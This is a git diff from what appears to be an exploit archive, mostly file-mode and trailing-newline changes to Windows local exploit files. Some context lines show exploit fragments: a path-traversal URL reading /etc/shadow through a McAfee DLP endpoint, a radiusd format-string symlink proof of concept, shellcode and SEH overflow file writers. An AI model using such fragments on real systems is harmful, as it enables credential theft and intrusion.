b/platforms/windows/local/3797.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3798.c b/platforms/windows/local/3798.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3801.c b/platforms/windows/local/3801.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/381.c b/platforms/windows/local/381.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38107.c b/platforms/windows/local/38107.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3811.c b/platforms/windows/local/3811.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3812.c b/platforms/windows/local/3812.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38185.txt b/platforms/windows/local/38185.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38198.txt b/platforms/windows/local/38198.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38199.txt b/platforms/windows/local/38199.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38200.txt b/platforms/windows/local/38200.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38201.txt b/platforms/windows/local/38201.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38202.txt b/platforms/windows/local/38202.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3823.c b/platforms/windows/local/3823.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38287.txt b/platforms/windows/local/38287.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38289.txt b/platforms/windows/local/38289.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38299.c b/platforms/windows/local/38299.txt old mode 100755 new mode 100644 similarity index 100% rename from platforms/windows/local/38299.c rename to platforms/windows/local/38299.txt diff --git a/platforms/windows/local/38452.txt b/platforms/windows/local/38452.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38474.txt b/platforms/windows/local/38474.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38533.c b/platforms/windows/local/38533.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3856.htm b/platforms/windows/local/3856.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38631.txt b/platforms/windows/local/38631.txt old mode 100755 new mode 100644 index 457a200d6..539592960 --- a/platforms/windows/local/38631.txt +++ b/platforms/windows/local/38631.txt @@ -8,4 +8,4 @@ McAfee Data Loss Prevention 9.2.1 is vulnerable; prior versions may also be affe https://www.example.com/ReDownloadLogs.do?filepath=/etc&filename=shadow&cmdName=false -https://www.example.com/ReDownloadLogs.do?filepath=/etc&filename=syslog.conf&cmdName=false \ No newline at end of file +https://www.example.com/ReDownloadLogs.do?filepath=/etc&filename=syslog.conf&cmdName=false \ No newline at end of file diff --git a/platforms/windows/local/38668.c b/platforms/windows/local/38668.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38672.txt b/platforms/windows/local/38672.txt old mode 100755 new mode 100644 index 2928774b7..489429a40 --- a/platforms/windows/local/38672.txt +++ b/platforms/windows/local/38672.txt @@ -10,4 +10,4 @@ The following proof-of-concept is available: ln -s radiusd %x -./%x -v \ No newline at end of file +./%x -v \ No newline at end of file diff --git a/platforms/windows/local/38751.txt b/platforms/windows/local/38751.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38752.c b/platforms/windows/local/38752.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38792.txt b/platforms/windows/local/38792.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/388.c b/platforms/windows/local/388.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38871.txt b/platforms/windows/local/38871.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38903.txt b/platforms/windows/local/38903.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/38904.txt b/platforms/windows/local/38904.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3897.c b/platforms/windows/local/3897.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39260.txt b/platforms/windows/local/39260.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39284.txt b/platforms/windows/local/39284.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39310.txt b/platforms/windows/local/39310.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39311.txt b/platforms/windows/local/39311.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39442.txt b/platforms/windows/local/39442.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/395.c b/platforms/windows/local/395.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39508.ps1 b/platforms/windows/local/39508.ps1 old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39510.txt b/platforms/windows/local/39510.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39531.c b/platforms/windows/local/39531.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39630.g b/platforms/windows/local/39630.g old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39666.txt b/platforms/windows/local/39666.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39670.txt b/platforms/windows/local/39670.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39671.txt b/platforms/windows/local/39671.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39680.txt b/platforms/windows/local/39680.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39694.txt b/platforms/windows/local/39694.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39719.ps1 b/platforms/windows/local/39719.ps1 old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39727.txt b/platforms/windows/local/39727.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/3975.c b/platforms/windows/local/3975.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39786.txt b/platforms/windows/local/39786.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39788.txt b/platforms/windows/local/39788.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39803.txt b/platforms/windows/local/39803.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39804.txt b/platforms/windows/local/39804.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39809.cs b/platforms/windows/local/39809.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39814.txt b/platforms/windows/local/39814.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39820.txt b/platforms/windows/local/39820.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39843.c b/platforms/windows/local/39843.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39845.txt b/platforms/windows/local/39845.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39888.txt b/platforms/windows/local/39888.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39902.txt b/platforms/windows/local/39902.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39903.txt b/platforms/windows/local/39903.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39908.txt b/platforms/windows/local/39908.txt old mode 100755 new mode 100644 index 6fca2ea5f..92ad9c6bf --- a/platforms/windows/local/39908.txt +++ b/platforms/windows/local/39908.txt @@ -46,4 +46,4 @@ Restart the service or the machine and Remote.exe will start with SYSTEM privile 3. Solution: -To fix it manually, open regedit, browse to HKLM\SYSTEM\CurrentControlSet\services and add the quotes to the ImagePath value of the relevant service. \ No newline at end of file +To fix it manually, open regedit, browse to HKLM\SYSTEM\CurrentControlSet\services and add the quotes to the ImagePath value of the relevant service. \ No newline at end of file diff --git a/platforms/windows/local/39916.txt b/platforms/windows/local/39916.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39954.txt b/platforms/windows/local/39954.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/39980.rb b/platforms/windows/local/39980.rb index 6b5813903..b63e56a20 100755 --- a/platforms/windows/local/39980.rb +++ b/platforms/windows/local/39980.rb @@ -69,4 +69,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(playlist) end -end \ No newline at end of file +end \ No newline at end of file diff --git a/platforms/windows/local/4001.cpp b/platforms/windows/local/4001.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40020.txt b/platforms/windows/local/40020.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40040.txt b/platforms/windows/local/40040.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40069.cpp b/platforms/windows/local/40069.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40071.txt b/platforms/windows/local/40071.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40072.txt b/platforms/windows/local/40072.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/401.c b/platforms/windows/local/401.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40118.txt b/platforms/windows/local/40118.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40132.txt b/platforms/windows/local/40132.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40145.txt b/platforms/windows/local/40145.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40173.txt b/platforms/windows/local/40173.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40219.txt b/platforms/windows/local/40219.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40224.txt b/platforms/windows/local/40224.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40226.txt b/platforms/windows/local/40226.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/403.c b/platforms/windows/local/403.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40322.txt b/platforms/windows/local/40322.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40323.txt b/platforms/windows/local/40323.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40335.txt b/platforms/windows/local/40335.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40340.txt b/platforms/windows/local/40340.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40362.txt b/platforms/windows/local/40362.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40365.txt b/platforms/windows/local/40365.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40375.txt b/platforms/windows/local/40375.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40376.txt b/platforms/windows/local/40376.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40389.php b/platforms/windows/local/40389.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40393.txt b/platforms/windows/local/40393.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40400.txt b/platforms/windows/local/40400.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40409.txt b/platforms/windows/local/40409.txt old mode 100755 new mode 100644 index 95061cec4..25e55c85f --- a/platforms/windows/local/40409.txt +++ b/platforms/windows/local/40409.txt @@ -33,4 +33,4 @@ STEP 12: Login with the new changed password. IMPACT: Access gained to the information stored to the target system without previous knowledge of password or any other information. This could also be used to elevate your privileges to local Administrator. Reference: Video PoC/Demo can be found here: https://www.youtube.com/watch?v=4vbmBrKRZGA -Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com) \ No newline at end of file +Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com) \ No newline at end of file diff --git a/platforms/windows/local/40410.txt b/platforms/windows/local/40410.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40417.txt b/platforms/windows/local/40417.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40418.txt b/platforms/windows/local/40418.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40422.txt b/platforms/windows/local/40422.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40425.txt b/platforms/windows/local/40425.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40426.txt b/platforms/windows/local/40426.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40427.txt b/platforms/windows/local/40427.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40428.txt b/platforms/windows/local/40428.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40429.cs b/platforms/windows/local/40429.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40430.cs b/platforms/windows/local/40430.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40438.txt b/platforms/windows/local/40438.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40442.txt b/platforms/windows/local/40442.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40443.txt b/platforms/windows/local/40443.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40460.txt b/platforms/windows/local/40460.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40461.txt b/platforms/windows/local/40461.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40471.txt b/platforms/windows/local/40471.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40473.txt b/platforms/windows/local/40473.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40477.txt b/platforms/windows/local/40477.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40478.txt b/platforms/windows/local/40478.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40482.txt b/platforms/windows/local/40482.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40483.txt b/platforms/windows/local/40483.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40484.txt b/platforms/windows/local/40484.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40485.txt b/platforms/windows/local/40485.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40490.txt b/platforms/windows/local/40490.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40494.txt b/platforms/windows/local/40494.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40497.txt b/platforms/windows/local/40497.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40520.txt b/platforms/windows/local/40520.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40522.txt b/platforms/windows/local/40522.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40523.txt b/platforms/windows/local/40523.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40525.txt b/platforms/windows/local/40525.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40528.txt b/platforms/windows/local/40528.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40533.txt b/platforms/windows/local/40533.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40535.txt b/platforms/windows/local/40535.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40538.txt b/platforms/windows/local/40538.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40539.txt b/platforms/windows/local/40539.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40540.txt b/platforms/windows/local/40540.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40541.txt b/platforms/windows/local/40541.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40550.txt b/platforms/windows/local/40550.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40562.cpp b/platforms/windows/local/40562.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40572.cs b/platforms/windows/local/40572.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40573.cs b/platforms/windows/local/40573.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40574.cs b/platforms/windows/local/40574.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40577.txt b/platforms/windows/local/40577.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40579.txt b/platforms/windows/local/40579.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40580.txt b/platforms/windows/local/40580.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40581.txt b/platforms/windows/local/40581.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40582.txt b/platforms/windows/local/40582.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40583.txt b/platforms/windows/local/40583.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40585.txt b/platforms/windows/local/40585.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40586.txt b/platforms/windows/local/40586.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40587.txt b/platforms/windows/local/40587.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40606.cpp b/platforms/windows/local/40606.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40607.cpp b/platforms/windows/local/40607.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40608.cs b/platforms/windows/local/40608.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40636.txt b/platforms/windows/local/40636.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40655.txt b/platforms/windows/local/40655.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40660.txt b/platforms/windows/local/40660.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40763.cs b/platforms/windows/local/40763.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40764.cs b/platforms/windows/local/40764.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40765.cs b/platforms/windows/local/40765.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4080.php b/platforms/windows/local/4080.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40807.txt b/platforms/windows/local/40807.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40823.txt b/platforms/windows/local/40823.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40848.java b/platforms/windows/local/40848.java old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40859.txt b/platforms/windows/local/40859.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40860.txt b/platforms/windows/local/40860.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40861.txt b/platforms/windows/local/40861.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40863.txt b/platforms/windows/local/40863.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40864.txt b/platforms/windows/local/40864.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40865.txt b/platforms/windows/local/40865.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40873.txt b/platforms/windows/local/40873.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40902.txt b/platforms/windows/local/40902.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40967.txt b/platforms/windows/local/40967.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40988.c b/platforms/windows/local/40988.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/40995.txt b/platforms/windows/local/40995.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41015.c b/platforms/windows/local/41015.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41031.txt b/platforms/windows/local/41031.txt old mode 100755 new mode 100644 index cefa1983d..ab277a045 --- a/platforms/windows/local/41031.txt +++ b/platforms/windows/local/41031.txt @@ -9,6 +9,4 @@ POC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41031.zip - - \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41031.zip \ No newline at end of file diff --git a/platforms/windows/local/41144.txt b/platforms/windows/local/41144.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41176.c b/platforms/windows/local/41176.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41207.txt b/platforms/windows/local/41207.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41221.txt b/platforms/windows/local/41221.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41320.txt b/platforms/windows/local/41320.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41321.txt b/platforms/windows/local/41321.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41476.txt b/platforms/windows/local/41476.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41538.cs b/platforms/windows/local/41538.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41542.c b/platforms/windows/local/41542.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41607.cs b/platforms/windows/local/41607.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41619.txt b/platforms/windows/local/41619.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4165.c b/platforms/windows/local/4165.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4178.txt b/platforms/windows/local/4178.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41878.txt b/platforms/windows/local/41878.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41887.txt b/platforms/windows/local/41887.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41901.cs b/platforms/windows/local/41901.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41902.txt b/platforms/windows/local/41902.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41933.txt b/platforms/windows/local/41933.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41959.txt b/platforms/windows/local/41959.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/41972.txt b/platforms/windows/local/41972.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42000.txt b/platforms/windows/local/42000.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42020.cpp b/platforms/windows/local/42020.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4204.php b/platforms/windows/local/4204.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42077.txt b/platforms/windows/local/42077.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42116.txt b/platforms/windows/local/42116.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42119.txt b/platforms/windows/local/42119.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42121.txt b/platforms/windows/local/42121.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42141.txt b/platforms/windows/local/42141.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4218.php b/platforms/windows/local/4218.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42310.txt b/platforms/windows/local/42310.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42319.txt b/platforms/windows/local/42319.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4236.php b/platforms/windows/local/4236.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42385.py b/platforms/windows/local/42385.py index 35d53531f..2195a41cf 100755 --- a/platforms/windows/local/42385.py +++ b/platforms/windows/local/42385.py @@ -48,5 +48,4 @@ try: file.close() raw_input("\nExploit has been created!\n") except: - print "There has been an Error" - \ No newline at end of file + print "There has been an Error" \ No newline at end of file diff --git a/platforms/windows/local/42425.txt b/platforms/windows/local/42425.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42426.txt b/platforms/windows/local/42426.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42432.cpp b/platforms/windows/local/42432.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4252.c b/platforms/windows/local/4252.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42537.txt b/platforms/windows/local/42537.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42542.txt b/platforms/windows/local/42542.txt old mode 100755 new mode 100644 index 10d3d7155..08c19cdaa --- a/platforms/windows/local/42542.txt +++ b/platforms/windows/local/42542.txt @@ -80,5 +80,4 @@ C:\WebCTRL6.0\WebCTRL Server.exe BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R - NT AUTHORITY\Authenticated Users:(ID)C - + NT AUTHORITY\Authenticated Users:(ID)C \ No newline at end of file diff --git a/platforms/windows/local/42565.py b/platforms/windows/local/42565.py index 8d2fbbf71..4fe5ae953 100755 --- a/platforms/windows/local/42565.py +++ b/platforms/windows/local/42565.py @@ -58,4 +58,4 @@ shellcode = ("\xdb\xd5\xbf\xd7\xf8\x35\x95\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1" padding = "\x44"*(1000-351) f = open ("exploit.txt", "w") f.write(buffer + nSEH + SEH + junk + shellcode + padding) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/local/42567.py b/platforms/windows/local/42567.py index a12d7d593..c3069edb3 100755 --- a/platforms/windows/local/42567.py +++ b/platforms/windows/local/42567.py @@ -58,4 +58,4 @@ f = open ("calc.txt", "w") f.write(data) f.close() -#Greetz => Jack Carlo +#Greetz => Jack Carlo \ No newline at end of file diff --git a/platforms/windows/local/42568.py b/platforms/windows/local/42568.py index 715435d3a..321aedc20 100755 --- a/platforms/windows/local/42568.py +++ b/platforms/windows/local/42568.py @@ -59,4 +59,4 @@ f = open ("calc.txt", "w") f.write(data) f.close() -#Greetz => Jack Carlo +#Greetz => Jack Carlo \ No newline at end of file diff --git a/platforms/windows/local/4257.c b/platforms/windows/local/4257.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42586.py b/platforms/windows/local/42586.py index 91aceb7f7..d484e6a42 100755 --- a/platforms/windows/local/42586.py +++ b/platforms/windows/local/42586.py @@ -55,5 +55,4 @@ data = buffer + nSEH + SEH + nops + buf f = open ("test.txt", "w") f.write(data) -f.close() - +f.close() \ No newline at end of file diff --git a/platforms/windows/local/42605.txt b/platforms/windows/local/42605.txt old mode 100755 new mode 100644 index 69aa7c5b3..829a3612d --- a/platforms/windows/local/42605.txt +++ b/platforms/windows/local/42605.txt @@ -33,4 +33,4 @@ Also, NSD can be used to attach, kill processes or create memory dumps under the 3. Solution: -This has been fixed on release 9.0.1 FP3 and 8.5.3 FP6. +This has been fixed on release 9.0.1 FP3 and 8.5.3 FP6. \ No newline at end of file diff --git a/platforms/windows/local/42612.py b/platforms/windows/local/42612.py index 5821e2696..14af70c54 100755 --- a/platforms/windows/local/42612.py +++ b/platforms/windows/local/42612.py @@ -84,4 +84,4 @@ a = open("Dup_Scout_buffer.txt", "w") a.write(data) a.close() -#Greetz : @Pulkit +#Greetz : @Pulkit \ No newline at end of file diff --git a/platforms/windows/local/4262.cpp b/platforms/windows/local/4262.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4263.cpp b/platforms/windows/local/4263.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4270.php b/platforms/windows/local/4270.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42718.rb b/platforms/windows/local/42718.rb index 1bef85ffa..b122b95b9 100755 --- a/platforms/windows/local/42718.rb +++ b/platforms/windows/local/42718.rb @@ -131,4 +131,4 @@ class MetasploitModule < Msf::Exploit::Remote end end -__END__ +__END__ \ No newline at end of file diff --git a/platforms/windows/local/42735.c b/platforms/windows/local/42735.c old mode 100755 new mode 100644 index c6986d1a7..5faf30569 --- a/platforms/windows/local/42735.c +++ b/platforms/windows/local/42735.c @@ -309,5 +309,4 @@ int main() exit(0); -} - +} \ No newline at end of file diff --git a/platforms/windows/local/4274.php b/platforms/windows/local/4274.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42890.txt b/platforms/windows/local/42890.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/42918.py b/platforms/windows/local/42918.py index dfdf2b82a..26efc446d 100755 --- a/platforms/windows/local/42918.py +++ b/platforms/windows/local/42918.py @@ -65,4 +65,4 @@ f.close() #GREETZ ---------- #Taushif(Brother) -#----------------- +#----------------- \ No newline at end of file diff --git a/platforms/windows/local/42921.py b/platforms/windows/local/42921.py index 01ee61d1d..664088e7d 100755 --- a/platforms/windows/local/42921.py +++ b/platforms/windows/local/42921.py @@ -61,4 +61,4 @@ file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf + f = open('evil.xml', 'w') f.write(file) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/local/42930.txt b/platforms/windows/local/42930.txt old mode 100755 new mode 100644 index bd5bc70a4..b7ade1b1b --- a/platforms/windows/local/42930.txt +++ b/platforms/windows/local/42930.txt @@ -128,5 +128,4 @@ is able to somehow bypass it, the vulnerability will surely affect the latest ve Tested on: Any Windows version that suppors Office 2007. -Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue. - +Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue. \ No newline at end of file diff --git a/platforms/windows/local/43017.txt b/platforms/windows/local/43017.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4302.php b/platforms/windows/local/4302.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4303.php b/platforms/windows/local/4303.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/43033.py b/platforms/windows/local/43033.py index 3f8bde8aa..be143dc3e 100755 --- a/platforms/windows/local/43033.py +++ b/platforms/windows/local/43033.py @@ -100,4 +100,4 @@ try: debug.loop() finally: - debug.stop() + debug.stop() \ No newline at end of file diff --git a/platforms/windows/local/43057.txt b/platforms/windows/local/43057.txt old mode 100755 new mode 100644 index f371b59dd..4e8bacdab --- a/platforms/windows/local/43057.txt +++ b/platforms/windows/local/43057.txt @@ -16,4 +16,4 @@ https://trackwatch.com/ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/43057.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/43057.zip \ No newline at end of file diff --git a/platforms/windows/local/43109.c b/platforms/windows/local/43109.c old mode 100755 new mode 100644 index 143be203a..f1d40f3ce --- a/platforms/windows/local/43109.c +++ b/platforms/windows/local/43109.c @@ -270,4 +270,4 @@ int main(int argc, char *argv[]) spawnShell(); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/local/4311.php b/platforms/windows/local/4311.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/43134.c 